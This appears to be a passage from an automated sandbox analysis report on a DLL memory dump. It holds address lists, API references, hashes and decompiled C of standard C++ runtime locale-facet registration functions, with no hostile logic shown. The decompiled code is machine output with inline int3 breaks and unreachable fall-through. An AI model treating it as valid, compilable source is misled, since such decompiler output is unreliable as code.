0x6d48fbb6
0x6d48fb7d
0x6d48fb7d
0x00000000
0x6d48fb7d
0x6d48fb7b
0x6d48faee
0x6d48faee
0x6d48faf1
0x6d48faf5
0x6d48faf9
0x6d48fb06
0x6d48fb0e
0x6d48fb10
0x00000000
0x6d48fb10
0x6d48fad7
0x6d48fad7
0x00000000
0x6d48fad7
0x6d48fad5
0x6d48fa48
0x6d48fa48
0x6d48fa4b
0x6d48fa4f
0x6d48fa53
0x6d48fa60
0x6d48fa68
0x6d48fa6a
0x00000000
0x6d48fa6a
0x6d48fa31
0x6d48fa31
0x00000000
0x6d48fa31
0x6d48fa2f
0x6d48f9a2
0x6d48f9a2
0x6d48f9a5
0x6d48f9a9
0x6d48f9ad
0x6d48f9ba
0x6d48f9c2
0x6d48f9c4
0x00000000
0x6d48f9c4
0x6d48f98b
0x6d48f98b
0x00000000
0x6d48f98b
0x6d48f989
0x6d48f8fc
0x6d48f8fc
0x6d48f8ff
0x6d48f903
0x6d48f907
0x6d48f914
0x6d48f91c
0x6d48f91e
0x00000000
0x6d48f91e
0x6d48f8e5
0x6d48f8e5
0x00000000
0x6d48f8e5
0x6d48f8e3
0x6d48f856
0x6d48f856
0x6d48f859
0x6d48f85d
0x6d48f861
0x6d48f86e
0x6d48f876
0x6d48f878
0x00000000
0x6d48f878
0x6d48f83f
0x6d48f83f
0x00000000
0x6d48f83f
0x6d48f83d

APIs

__EH_prolog3.LIBCMT ref: 6D48F806
std::_Lockit::_Lockit.LIBCPMT ref: 6D48F810
int.LIBCPMT ref: 6D48F827

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D48F861
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F881
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F89F

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 88baf692847629dac009a68b237dc511a2911be5f56cc8fa1920d166994d622d
Instruction ID: 810f1338df1e62c8d92567dd59dcb3acee500d2746aa7bb99502f819230f591e
Opcode Fuzzy Hash: 88baf692847629dac009a68b237dc511a2911be5f56cc8fa1920d166994d622d
Instruction Fuzzy Hash: FC11AC768086299BCF05EBA4C844FEDBB75AF94354F2A401CD611AB391DB74DE018BE2

Uniqueness

Uniqueness Score: -1.00%

Function 6D48A1A5, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6D48A1A5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				void* _v16;
				void* _v20;
				char _v32;
				void* _t49;
				intOrPtr* _t50;
				void* _t62;
				void* _t75;
				intOrPtr* _t120;
				intOrPtr* _t133;
				intOrPtr* _t134;
				void* _t136;
				intOrPtr* _t137;
				void* _t138;

				_t99 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653( &_v20, 0);
				_t136 =  *0x6d546ccc; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t136;
				_t49 = E6D46161C(0x6d546cb8);
				_t102 = _a8;
				_t50 = E6D46171B(_a8, _t49);
				_t132 = _t50;
				if(_t50 != 0) {
					L5:
					E6D4866BA( &_v20);
					return E6D4A0075(_t132);
				} else {
					if(_t136 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6D48AA38(__ebx, _t102, __edx, _t132, _t136) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438( &_v32);
							E6D4A3D74( &_v32, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t132, _t136, 0x14);
							E6D486653( &_v20, 0);
							_t137 =  *0x6d546cd0; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t137;
							_t62 = E6D46161C(0x6d546cbc);
							_t109 = _a8;
							_t133 = E6D46171B(_a8, _t62);
							__eflags = _t133;
							if(_t133 != 0) {
								L12:
								E6D4866BA( &_v20);
								return E6D4A0075(_t133);
							} else {
								__eflags = _t137;
								if(_t137 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6D48AAA0(__ebx, _t109, __edx, _t133, _t137) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438( &_v32);
										E6D4A3D74( &_v32, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t99, _t133, _t137, 0x14);
										E6D486653( &_v20, 0);
										_t138 =  *0x6d546cd4; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t138;
										_t75 = E6D46161C(0x6d546cc0);
										_t116 = _a8;
										_t134 = E6D46171B(_a8, _t75);
										__eflags = _t134;
										if(_t134 != 0) {
											L19:
											E6D4866BA( &_v20);
											return E6D4A0075(_t134);
										} else {
											__eflags = _t138;
											if(_t138 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6D48AB08(_t99, _t116, __edx, _t134, _t138) - 0xffffffff;
												if(__eflags == 0) {
													_t120 =  &_v32;
													E6D461438(_t120);
													E6D4A3D74( &_v32, 0x6d543504);
													asm("int3");
													_push(_t120);
													 *((intOrPtr*)(_t120 + 4)) = _v4;
													_v20 = _t120;
													 *_t120 = 0x6d4eba24;
													return _t120;
												} else {
													_t134 = _v16;
													_v16 = _t134;
													_v4 = 1;
													E6D486FD3(__eflags, _t134);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t134 + 4))))();
													 *0x6d546cd4 = _t134;
													goto L19;
												}
											} else {
												_t134 = _t138;
												goto L19;
											}
										}
									} else {
										_t133 = _v16;
										_v16 = _t133;
										_v4 = 1;
										E6D486FD3(__eflags, _t133);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t133 + 4))))();
										 *0x6d546cd0 = _t133;
										goto L12;
									}
								} else {
									_t133 = _t137;
									goto L12;
								}
							}
						} else {
							_t132 = _v16;
							_v16 = _t132;
							_v4 = 1;
							E6D486FD3(__eflags, _t132);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t132 + 4))))();
							 *0x6d546ccc = _t132;
							goto L5;
						}
					} else {
						_t132 = _t136;
						goto L5;
					}
				}
			}

0x6d48a1a5
0x6d48a1ac
0x6d48a1b6
0x6d48a1bb
0x6d48a1c6
0x6d48a1ca
0x6d48a1cd
0x6d48a1d2
0x6d48a1d6
0x6d48a1db
0x6d48a1df
0x6d48a224
0x6d48a227
0x6d48a233
0x6d48a1e1
0x6d48a1e3
0x6d48a1e9
0x6d48a1ef
0x6d48a1f7
0x6d48a1fa
0x6d48a237
0x6d48a245
0x6d48a24a
0x6d48a252
0x6d48a25c
0x6d48a261
0x6d48a26c
0x6d48a270
0x6d48a273
0x6d48a278
0x6d48a281
0x6d48a283
0x6d48a285
0x6d48a2ca
0x6d48a2cd
0x6d48a2d9
0x6d48a287
0x6d48a287
0x6d48a289
0x6d48a28f
0x6d48a295
0x6d48a29d
0x6d48a2a0
0x6d48a2dd
0x6d48a2eb
0x6d48a2f0
0x6d48a2f8
0x6d48a302
0x6d48a307
0x6d48a312
0x6d48a316
0x6d48a319
0x6d48a31e
0x6d48a327
0x6d48a329
0x6d48a32b
0x6d48a370
0x6d48a373
0x6d48a37f
0x6d48a32d
0x6d48a32d
0x6d48a32f
0x6d48a335
0x6d48a33b
0x6d48a343
0x6d48a346
0x6d48a380
0x6d48a383
0x6d48a391
0x6d48a396
0x6d48a39a
0x6d48a39e
0x6d48a3a3
0x6d48a3a6
0x6d48a3ad
0x6d48a348
0x6d48a348
0x6d48a34b
0x6d48a34f
0x6d48a353
0x6d48a360
0x6d48a368
0x6d48a36a
0x00000000
0x6d48a36a
0x6d48a331
0x6d48a331
0x00000000
0x6d48a331
0x6d48a32f
0x6d48a2a2
0x6d48a2a2
0x6d48a2a5
0x6d48a2a9
0x6d48a2ad
0x6d48a2ba
0x6d48a2c2
0x6d48a2c4
0x00000000
0x6d48a2c4
0x6d48a28b
0x6d48a28b
0x00000000
0x6d48a28b
0x6d48a289
0x6d48a1fc
0x6d48a1fc
0x6d48a1ff
0x6d48a203
0x6d48a207
0x6d48a214
0x6d48a21c
0x6d48a21e
0x00000000
0x6d48a21e
0x6d48a1e5
0x6d48a1e5
0x00000000
0x6d48a1e5
0x6d48a1e3

APIs

__EH_prolog3.LIBCMT ref: 6D48A1AC
std::_Lockit::_Lockit.LIBCPMT ref: 6D48A1B6
int.LIBCPMT ref: 6D48A1CD

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D48A207
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48A227
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48A245

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 157f89e826c6ce93b8edbf6a23fbbcfbad65b5565dd51bd97184c100e906d634
Instruction ID: 7c7e697f728830f6e76bed9a50a12732e9de3e5a872ab48a7a2ba70eee9bef4e
Opcode Fuzzy Hash: 157f89e826c6ce93b8edbf6a23fbbcfbad65b5565dd51bd97184c100e906d634
Instruction Fuzzy Hash: 6311CE7580811A9BCF04EBA4C841EEDB7B4AF94318F2A400DD611A7392CFB5DE018BE2

Uniqueness

Uniqueness Score: -1.00%

Function 6D48A24B, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6D48A24B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				intOrPtr _v0;
				signed int _v4;
				void* _v16;
				char _v20;
				char _v32;
				void* _t35;
				intOrPtr* _t36;
				void* _t48;
				intOrPtr* _t82;
				intOrPtr* _t92;
				void* _t94;
				void* _t95;

				_t68 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653( &_v20, 0);
				_t94 =  *0x6d546cd0; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t94;
				_t35 = E6D46161C(0x6d546cbc);
				_t71 = _a8;
				_t36 = E6D46171B(_a8, _t35);
				_t91 = _t36;
				if(_t36 != 0) {
					L5:
					E6D4866BA( &_v20);
					return E6D4A0075(_t91);
				} else {
					if(_t94 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6D48AAA0(__ebx, _t71, __edx, _t91, _t94) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438( &_v32);
							E6D4A3D74( &_v32, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t91, _t94, 0x14);
							E6D486653( &_v20, 0);
							_t95 =  *0x6d546cd4; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t95;
							_t48 = E6D46161C(0x6d546cc0);
							_t78 = _a8;
							_t92 = E6D46171B(_a8, _t48);
							__eflags = _t92;
							if(_t92 != 0) {
								L12:
								E6D4866BA( &_v20);
								return E6D4A0075(_t92);
							} else {
								__eflags = _t95;
								if(_t95 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6D48AB08(_t68, _t78, __edx, _t92, _t95) - 0xffffffff;
									if(__eflags == 0) {
										_t82 =  &_v32;
										E6D461438(_t82);
										E6D4A3D74( &_v32, 0x6d543504);
										asm("int3");
										_push(_t82);
										 *((intOrPtr*)(_t82 + 4)) = _v0;
										_v16 = _t82;
										 *_t82 = 0x6d4eba24;
										return _t82;
									} else {
										_t92 = _v16;
										_v16 = _t92;
										_v4 = 1;
										E6D486FD3(__eflags, _t92);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t92 + 4))))();
										 *0x6d546cd4 = _t92;
										goto L12;
									}
								} else {
									_t92 = _t95;
									goto L12;
								}
							}
						} else {
							_t91 = _v16;
							_v16 = _t91;
							_v4 = 1;
							E6D486FD3(__eflags, _t91);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t91 + 4))))();
							 *0x6d546cd0 = _t91;
							goto L5;
						}
					} else {
						_t91 = _t94;
						goto L5;
					}
				}
			}

0x6d48a24b
0x6d48a252
0x6d48a25c
0x6d48a261
0x6d48a26c
0x6d48a270
0x6d48a273
0x6d48a278
0x6d48a27c
0x6d48a281
0x6d48a285
0x6d48a2ca
0x6d48a2cd
0x6d48a2d9
0x6d48a287
0x6d48a289
0x6d48a28f
0x6d48a295
0x6d48a29d
0x6d48a2a0
0x6d48a2dd
0x6d48a2eb
0x6d48a2f0
0x6d48a2f8
0x6d48a302
0x6d48a307
0x6d48a312
0x6d48a316
0x6d48a319
0x6d48a31e
0x6d48a327
0x6d48a329
0x6d48a32b
0x6d48a370
0x6d48a373
0x6d48a37f
0x6d48a32d
0x6d48a32d
0x6d48a32f
0x6d48a335
0x6d48a33b
0x6d48a343
0x6d48a346
0x6d48a380
0x6d48a383
0x6d48a391
0x6d48a396
0x6d48a39a
0x6d48a39e
0x6d48a3a3
0x6d48a3a6
0x6d48a3ad
0x6d48a348
0x6d48a348
0x6d48a34b
0x6d48a34f
0x6d48a353
0x6d48a360
0x6d48a368
0x6d48a36a
0x00000000
0x6d48a36a
0x6d48a331
0x6d48a331
0x00000000
0x6d48a331
0x6d48a32f
0x6d48a2a2
0x6d48a2a2
0x6d48a2a5
0x6d48a2a9
0x6d48a2ad
0x6d48a2ba
0x6d48a2c2
0x6d48a2c4
0x00000000
0x6d48a2c4
0x6d48a28b
0x6d48a28b
0x00000000
0x6d48a28b
0x6d48a289

APIs

__EH_prolog3.LIBCMT ref: 6D48A252
std::_Lockit::_Lockit.LIBCPMT ref: 6D48A25C
int.LIBCPMT ref: 6D48A273

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D48A2AD
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48A2CD
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48A2EB

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 2d17a61d05bb58849a62b93c06df0b732d5b5d49bdf1894ed3b49293624192b7
Instruction ID: 25adec55a693d29c2407b1b7c9c126a34b206e1fa73fcabee832ec0d1734c6da
Opcode Fuzzy Hash: 2d17a61d05bb58849a62b93c06df0b732d5b5d49bdf1894ed3b49293624192b7
Instruction Fuzzy Hash: F411CE759082299BCF00EBA4C841EEDB775AFA4314F2A400CD612A7392DBB5ED01C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F2CF, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D48F2CF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t237;
				signed int _t238;
				void* _t250;
				void* _t263;
				void* _t276;
				void* _t289;
				void* _t302;
				void* _t315;
				void* _t328;
				void* _t341;
				void* _t354;
				void* _t367;
				void* _t380;
				void* _t393;
				void* _t406;
				void* _t419;
				void* _t432;
				signed int _t625;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				signed int _t680;
				signed int _t681;
				signed int _t682;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				signed int _t686;
				signed int _t687;
				signed int _t688;
				signed int _t689;
				signed int _t690;
				signed int _t691;
				signed int _t693;
				signed int _t694;
				signed int _t695;
				signed int _t696;
				signed int _t697;
				signed int _t698;
				signed int _t699;
				signed int _t700;
				signed int _t701;
				signed int _t702;
				signed int _t703;
				signed int _t704;
				signed int _t705;
				signed int _t706;
				signed int _t707;
				signed int _t708;
				signed int _t709;
				void* _t726;

				_t674 = __edx;
				_t513 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t726 - 0x14, 0);
				_t693 =  *0x6d546dec; // 0x0
				 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
				 *(_t726 - 0x10) = _t693;
				_t237 = E6D46161C(0x6d546d98);
				_t516 =  *((intOrPtr*)(_t726 + 8));
				_t238 = E6D46171B( *((intOrPtr*)(_t726 + 8)), _t237);
				_t676 = _t238;
				if(_t238 != 0) {
					L5:
					E6D4866BA(_t726 - 0x14);
					return E6D4A0075(_t676);
				} else {
					if(_t693 == 0) {
						_push( *((intOrPtr*)(_t726 + 8)));
						_push(_t726 - 0x10);
						__eflags = E6D490F87(__ebx, _t516, __edx, _t676, _t693) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t726 - 0x20);
							E6D4A3D74(_t726 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t676, _t693, 0x14);
							E6D486653(_t726 - 0x14, 0);
							_t694 =  *0x6d546dbc; // 0x0
							 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
							 *(_t726 - 0x10) = _t694;
							_t250 = E6D46161C(0x6d546d70);
							_t523 =  *((intOrPtr*)(_t726 + 8));
							_t677 = E6D46171B( *((intOrPtr*)(_t726 + 8)), _t250);
							__eflags = _t677;
							if(_t677 != 0) {
								L12:
								E6D4866BA(_t726 - 0x14);
								return E6D4A0075(_t677);
							} else {
								__eflags = _t694;
								if(_t694 == 0) {
									_push( *((intOrPtr*)(_t726 + 8)));
									_push(_t726 - 0x10);
									__eflags = E6D490FEF(_t513, _t523, __edx, _t677, _t694) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t726 - 0x20);
										E6D4A3D74(_t726 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t513, _t677, _t694, 0x14);
										E6D486653(_t726 - 0x14, 0);
										_t695 =  *0x6d546df0; // 0x0
										 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
										 *(_t726 - 0x10) = _t695;
										_t263 = E6D46161C(0x6d546d9c);
										_t530 =  *((intOrPtr*)(_t726 + 8));
										_t678 = E6D46171B( *((intOrPtr*)(_t726 + 8)), _t263);
										__eflags = _t678;
										if(_t678 != 0) {
											L19:
											E6D4866BA(_t726 - 0x14);
											return E6D4A0075(_t678);
										} else {
											__eflags = _t695;
											if(_t695 == 0) {
												_push( *((intOrPtr*)(_t726 + 8)));
												_push(_t726 - 0x10);
												__eflags = E6D491057(_t513, _t530, __edx, _t678, _t695) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t726 - 0x20);
													E6D4A3D74(_t726 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t513, _t678, _t695, 0x14);
													E6D486653(_t726 - 0x14, 0);
													_t696 =  *0x6d546dc0; // 0x0
													 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
													 *(_t726 - 0x10) = _t696;
													_t276 = E6D46161C(0x6d546d74);
													_t537 =  *((intOrPtr*)(_t726 + 8));
													_t679 = E6D46171B( *((intOrPtr*)(_t726 + 8)), _t276);
													__eflags = _t679;
													if(_t679 != 0) {
														L26:
														E6D4866BA(_t726 - 0x14);
														return E6D4A0075(_t679);
													} else {
														__eflags = _t696;
														if(_t696 == 0) {
															_push( *((intOrPtr*)(_t726 + 8)));
															_push(_t726 - 0x10);
															__eflags = E6D4910BF(_t513, _t537, _t674, _t679, _t696) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t726 - 0x20);
																E6D4A3D74(_t726 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t513, _t679, _t696, 0x14);
																E6D486653(_t726 - 0x14, 0);
																_t697 =  *0x6d546df8; // 0x0
																 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																 *(_t726 - 0x10) = _t697;
																_t289 = E6D46161C(0x6d546da4);
																_t544 =  *((intOrPtr*)(_t726 + 8));
																_t680 = E6D46171B( *((intOrPtr*)(_t726 + 8)), _t289);
																__eflags = _t680;
																if(_t680 != 0) {
																	L33:
																	E6D4866BA(_t726 - 0x14);
																	return E6D4A0075(_t680);
																} else {
																	__eflags = _t697;
																	if(_t697 == 0) {
																		_push( *((intOrPtr*)(_t726 + 8)));
																		_push(_t726 - 0x10);
																		__eflags = E6D491127(_t513, _t544, _t674, _t680, _t697) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t726 - 0x20);
																			E6D4A3D74(_t726 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t513, _t680, _t697, 0x14);
																			E6D486653(_t726 - 0x14, 0);
																			_t698 =  *0x6d546df4; // 0x0
																			 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																			 *(_t726 - 0x10) = _t698;
																			_t302 = E6D46161C(0x6d546da0);
																			_t551 =  *((intOrPtr*)(_t726 + 8));
																			_t681 = E6D46171B( *((intOrPtr*)(_t726 + 8)), _t302);
																			__eflags = _t681;
																			if(_t681 != 0) {
																				L40:
																				E6D4866BA(_t726 - 0x14);
																				return E6D4A0075(_t681);
																			} else {
																				__eflags = _t698;
																				if(_t698 == 0) {
																					_push( *((intOrPtr*)(_t726 + 8)));
																					_push(_t726 - 0x10);
																					__eflags = E6D4911AB(_t513, _t551, _t674, _t681, _t698) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t726 - 0x20);
																						E6D4A3D74(_t726 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t513, _t681, _t698, 0x14);
																						E6D486653(_t726 - 0x14, 0);
																						_t699 =  *0x6d546dc8; // 0x0
																						 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																						 *(_t726 - 0x10) = _t699;
																						_t315 = E6D46161C(0x6d546d7c);
																						_t558 =  *((intOrPtr*)(_t726 + 8));
																						_t682 = E6D46171B( *((intOrPtr*)(_t726 + 8)), _t315);
																						__eflags = _t682;
																						if(_t682 != 0) {
																							L47:
																							E6D4866BA(_t726 - 0x14);
																							return E6D4A0075(_t682);
																						} else {
																							__eflags = _t699;
																							if(_t699 == 0) {
																								_push( *((intOrPtr*)(_t726 + 8)));
																								_push(_t726 - 0x10);
																								__eflags = E6D491230(_t513, _t558, _t674, _t682, _t699) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D461438(_t726 - 0x20);
																									E6D4A3D74(_t726 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e83cf, _t513, _t682, _t699, 0x14);
																									E6D486653(_t726 - 0x14, 0);
																									_t700 =  *0x6d546dc4; // 0x0
																									 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																									 *(_t726 - 0x10) = _t700;
																									_t328 = E6D46161C(0x6d546d78);
																									_t565 =  *((intOrPtr*)(_t726 + 8));
																									_t683 = E6D46171B( *((intOrPtr*)(_t726 + 8)), _t328);
																									__eflags = _t683;
																									if(_t683 != 0) {
																										L54:
																										E6D4866BA(_t726 - 0x14);
																										return E6D4A0075(_t683);
																									} else {
																										__eflags = _t700;
																										if(_t700 == 0) {
																											_push( *((intOrPtr*)(_t726 + 8)));
																											_push(_t726 - 0x10);
																											__eflags = E6D4912B4(_t513, _t565, _t674, _t683, _t700) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D461438(_t726 - 0x20);
																												E6D4A3D74(_t726 - 0x20, 0x6d543504);
																												asm("int3");
																												E6D4A00AC(0x6d4e83cf, _t513, _t683, _t700, 0x14);
																												E6D486653(_t726 - 0x14, 0);
																												_t701 =  *0x6d546dd8; // 0x0
																												 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																												 *(_t726 - 0x10) = _t701;
																												_t341 = E6D46161C(0x6d546d84);
																												_t572 =  *((intOrPtr*)(_t726 + 8));
																												_t684 = E6D46171B( *((intOrPtr*)(_t726 + 8)), _t341);
																												__eflags = _t684;
																												if(_t684 != 0) {
																													L61:
																													E6D4866BA(_t726 - 0x14);
																													return E6D4A0075(_t684);
																												} else {
																													__eflags = _t701;
																													if(_t701 == 0) {
																														_push( *((intOrPtr*)(_t726 + 8)));
																														_push(_t726 - 0x10);
																														__eflags = E6D491339(_t513, _t572, _t674, _t684, _t701) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D461438(_t726 - 0x20);
																															E6D4A3D74(_t726 - 0x20, 0x6d543504);
																															asm("int3");
																															E6D4A00AC(0x6d4e83cf, _t513, _t684, _t701, 0x14);
																															E6D486653(_t726 - 0x14, 0);
																															_t702 =  *0x6d546db0; // 0x0
																															 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																															 *(_t726 - 0x10) = _t702;
																															_t354 = E6D46161C(0x6d546d64);
																															_t579 =  *((intOrPtr*)(_t726 + 8));
																															_t685 = E6D46171B( *((intOrPtr*)(_t726 + 8)), _t354);
																															__eflags = _t685;
																															if(_t685 != 0) {
																																L68:
																																E6D4866BA(_t726 - 0x14);
																																return E6D4A0075(_t685);
																															} else {
																																__eflags = _t702;
																																if(_t702 == 0) {
																																	_push( *((intOrPtr*)(_t726 + 8)));
																																	_push(_t726 - 0x10);
																																	__eflags = E6D4913A1(_t513, _t579, _t674, _t685, _t702) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6D461438(_t726 - 0x20);
																																		E6D4A3D74(_t726 - 0x20, 0x6d543504);
																																		asm("int3");
																																		E6D4A00AC(0x6d4e83cf, _t513, _t685, _t702, 0x14);
																																		E6D486653(_t726 - 0x14, 0);
																																		_t703 =  *0x6d546ddc; // 0x0
																																		 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																		 *(_t726 - 0x10) = _t703;
																																		_t367 = E6D46161C(0x6d546d88);
																																		_t586 =  *((intOrPtr*)(_t726 + 8));
																																		_t686 = E6D46171B( *((intOrPtr*)(_t726 + 8)), _t367);
																																		__eflags = _t686;
																																		if(_t686 != 0) {
																																			L75:
																																			E6D4866BA(_t726 - 0x14);
																																			return E6D4A0075(_t686);
																																		} else {
																																			__eflags = _t703;
																																			if(_t703 == 0) {
																																				_push( *((intOrPtr*)(_t726 + 8)));
																																				_push(_t726 - 0x10);
																																				__eflags = E6D491409(_t513, _t586, _t674, _t686, _t703) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6D461438(_t726 - 0x20);
																																					E6D4A3D74(_t726 - 0x20, 0x6d543504);
																																					asm("int3");
																																					E6D4A00AC(0x6d4e83cf, _t513, _t686, _t703, 0x14);
																																					E6D486653(_t726 - 0x14, 0);
																																					_t704 =  *0x6d546de0; // 0x0
																																					 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																					 *(_t726 - 0x10) = _t704;
																																					_t380 = E6D46161C(0x6d546d8c);
																																					_t593 =  *((intOrPtr*)(_t726 + 8));
																																					_t687 = E6D46171B( *((intOrPtr*)(_t726 + 8)), _t380);
																																					__eflags = _t687;
																																					if(_t687 != 0) {
																																						L82:
																																						E6D4866BA(_t726 - 0x14);
																																						return E6D4A0075(_t687);
																																					} else {
																																						__eflags = _t704;
																																						if(_t704 == 0) {
																																							_push( *((intOrPtr*)(_t726 + 8)));
																																							_push(_t726 - 0x10);
																																							__eflags = E6D491471(_t513, _t593, _t674, _t687, _t704) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6D461438(_t726 - 0x20);
																																								E6D4A3D74(_t726 - 0x20, 0x6d543504);
																																								asm("int3");
																																								E6D4A00AC(0x6d4e83cf, _t513, _t687, _t704, 0x14);
																																								E6D486653(_t726 - 0x14, 0);
																																								_t705 =  *0x6d546dfc; // 0x0
																																								 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																								 *(_t726 - 0x10) = _t705;
																																								_t393 = E6D46161C(0x6d546da8);
																																								_t600 =  *((intOrPtr*)(_t726 + 8));
																																								_t688 = E6D46171B( *((intOrPtr*)(_t726 + 8)), _t393);
